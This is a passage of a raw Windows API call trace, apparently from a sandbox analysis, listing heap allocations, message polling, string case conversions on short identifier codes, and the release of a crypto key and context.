wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.529] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.529] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.529] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.529] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.529] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.530] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.536] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.536] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.536] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.536] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.536] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.548] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.548] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0266.548] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.549] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0266.549] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.549] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.549] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.549] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.549] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.550] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.550] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.550] CryptDestroyKey (hKey=0xaa5660) returned 1 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.551] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.551] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.551] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.552] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.552] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.552] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.552] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.552] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.552] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.552] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.553] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.553] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.553] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.553] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.553] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.553] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.553] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.553] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.553] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.553] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.554] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.554] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.554] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.554] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.554] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.554] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.554] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.554] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.555] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.555] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.555] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.555] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.555] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.555] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.555] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.556] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0266.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.558] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.558] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.559] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, 